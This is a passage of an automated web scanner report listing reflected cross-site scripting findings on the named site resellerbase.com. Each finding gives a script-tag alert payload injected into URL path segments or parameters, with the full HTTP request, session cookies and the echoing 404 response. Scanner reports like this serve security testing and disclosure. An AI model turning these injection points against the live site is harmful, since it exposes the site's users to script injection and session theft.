User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/2447c<script>alert(1)</script>258e67d5af5 was not found on this server.</p>
...[SNIP]...

2.1004. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 476b3<script>alert(1)</script>80145c60f44 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail476b3<script>alert(1)</script>80145c60f44/12/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail476b3<script>alert(1)</script>80145c60f44/12/rating.php was not found on this server.</p>
...[SNIP]...

2.1005. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c6c7e<script>alert(1)</script>699a46f43d373223f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailc6c7e<script>alert(1)</script>699a46f43d373223f/12/rating.php?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc6c7e<script>alert(1)</script>699a46f43d373223f/12/rating.php?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1006. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e53b8<script>alert(1)</script>82390aa1493 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12e53b8<script>alert(1)</script>82390aa1493/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12e53b8<script>alert(1)</script>82390aa1493/rating.php was not found on this server.</p>
...[SNIP]...

2.1007. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ffa0b<script>alert(1)</script>89ec96d04528a67f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12ffa0b<script>alert(1)</script>89ec96d04528a67f2/rating.php?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12ffa0b<script>alert(1)</script>89ec96d04528a67f2/rating.php?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1008. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload dd66c<script>alert(1)</script>417ad9f8bbbb432c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12/rating.phpdd66c<script>alert(1)</script>417ad9f8bbbb432c3?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.phpdd66c<script>alert(1)</script>417ad9f8bbbb432c3?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1009. http://www.resellerbase.com/detail/12/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3e51d<script>alert(1)</script>fc8fcf107fe was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/rating.php3e51d<script>alert(1)</script>fc8fcf107fe HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.php3e51d<script>alert(1)</script>fc8fcf107fe was not found on this server.</p>
...[SNIP]...

2.1010. http://www.resellerbase.com/detail/12/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d3a5a<script>alert(1)</script>dfc03b35efd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/rating.php?d3a5a<script>alert(1)</script>dfc03b35efd=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.php?d3a5a<script>alert(1)</script>dfc03b35efd=1 was not found on this server.</p>
...[SNIP]...

2.1011. http://www.resellerbase.com/detail/12/rating.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload ceb00<script>alert(1)</script>a9f72190fe6b03908 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/12/rating.php/ceb00<script>alert(1)</script>a9f72190fe6b03908?id=12&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/rating.php/ceb00<script>alert(1)</script>a9f72190fe6b03908?id=12&rating=5 was not found on this server.</p>
...[SNIP]...

2.1012. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e9324<script>alert(1)</script>1b0867f7c2e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaile9324<script>alert(1)</script>1b0867f7c2e/12/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaile9324<script>alert(1)</script>1b0867f7c2e/12/search.php was not found on this server.</p>
...[SNIP]...

2.1013. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23188<script>alert(1)</script>92691f00f8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/1223188<script>alert(1)</script>92691f00f8d/search.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/1223188<script>alert(1)</script>92691f00f8d/search.php was not found on this server.</p>
...[SNIP]...

2.1014. http://www.resellerbase.com/detail/12/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4bca3<script>alert(1)</script>6e712fb3a1d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/search.php4bca3<script>alert(1)</script>6e712fb3a1d HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php4bca3<script>alert(1)</script>6e712fb3a1d was not found on this server.</p>
...[SNIP]...

2.1015. http://www.resellerbase.com/detail/12/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e4a5d<a>688df8bb7ea was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...&Submit3=Searche4a5d<a>688df8bb7ea&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...&Submit3=Searche4a5d<a>688df8bb7ea&opt=2 was not found on this server.</p>
...[SNIP]...

2.1016. http://www.resellerbase.com/detail/12/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 75315<a>476bd0d6cf0 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...75315<a>476bd0d6cf0&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...75315<a>476bd0d6cf0&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1017. http://www.resellerbase.com/detail/12/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7dc34<script>alert(1)</script>56199da18da was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/search.php?7dc34<script>alert(1)</script>56199da18da=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?7dc34<script>alert(1)</script>56199da18da=1 was not found on this server.</p>
...[SNIP]...

2.1018. http://www.resellerbase.com/detail/12/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/12/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload ab5ac<a>5459d556c62 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/search.php?keyword=search...&Submit3=Search&opt=2ab5ac<a>5459d556c62 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/search.php?keyword=search...&Submit3=Search&opt=2ab5ac<a>5459d556c62 was not found on this server.</p>
...[SNIP]...

2.1019. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 58354<script>alert(1)</script>411df7e3d89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail58354<script>alert(1)</script>411df7e3d89/12/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail58354<script>alert(1)</script>411df7e3d89/12/themes/ was not found on this server.</p>
...[SNIP]...

2.1020. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a6b70<script>alert(1)</script>718c3f7c52e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12a6b70<script>alert(1)</script>718c3f7c52e/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12a6b70<script>alert(1)</script>718c3f7c52e/themes/ was not found on this server.</p>
...[SNIP]...

2.1021. http://www.resellerbase.com/detail/12/themes/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6a8d5<script>alert(1)</script>8ebe3ed058a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes6a8d5<script>alert(1)</script>8ebe3ed058a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes6a8d5<script>alert(1)</script>8ebe3ed058a/ was not found on this server.</p>
...[SNIP]...

2.1022. http://www.resellerbase.com/detail/12/themes/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/12/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8571<script>alert(1)</script>bb102279e0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/?e8571<script>alert(1)</script>bb102279e0f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/?e8571<script>alert(1)</script>bb102279e0f=1 was not found on this server.</p>
...[SNIP]...

